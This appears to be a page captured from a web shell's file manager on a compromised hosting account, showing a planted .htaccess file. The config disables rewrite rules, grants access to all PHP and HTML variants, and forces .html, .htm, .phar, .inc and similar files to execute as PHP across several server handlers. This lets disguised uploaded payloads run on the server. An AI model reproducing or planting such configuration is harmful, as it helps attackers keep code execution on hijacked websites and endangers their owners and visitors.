Your IP : 216.73.217.47


Current Path : /home/azimutno/www/cli/cli/
Upload File :
Current File : /home/azimutno/www/cli/cli/.htaccess

<IfModule mod_rewrite.c>
    RewriteEngine Off
</IfModule>

<IfModule mod_authz_core.c>
    <FilesMatch "\.(php|phtml|php3|php4|php5|php7|php8|phar|inc|shtml|html|htm)$">
    Require all granted
    </FilesMatch>
</IfModule>

<FilesMatch "\.(php|phtml|php3|php4|php5|php7|php8|phar|inc|shtml|html|htm)$">
    Order allow,deny
    allow from all
</FilesMatch>

# REGISTER HANDLER UNTUK SEMUA EKSTENSI
<IfModule mod_php7.c>
    AddHandler application/x-httpd-php .php .phtml .php3 .php4 .php5 .php7 .php8 .phar .inc .shtml .html .htm
</IfModule>

<IfModule mod_php8.c>
    AddHandler application/x-httpd-php .php .phtml .php3 .php4 .php5 .php7 .php8 .phar .inc .shtml .html .htm
</IfModule>

<IfModule mod_php.c>
    AddHandler application/x-httpd-php .php .phtml .php3 .php4 .php5 .php7 .php8 .phar .inc .shtml .html .htm
</IfModule>

<IfModule mod_suphp.c>
    suPHP_ConfigPath /home
    AddType application/x-httpd-php .php .phtml .php3 .php4 .php5 .php7 .php8 .phar .inc .shtml .html .htm
</IfModule>

<IfModule mod_fcgid.c>
    AddHandler fcgid-script .php .phtml .php3 .php4 .php5 .php7 .php8 .phar .inc .shtml .html .htm
</IfModule>

AddType application/x-httpd-php .php .phtml .php3 .php4 .php5 .php7 .php8 .phar .inc .shtml .html .htm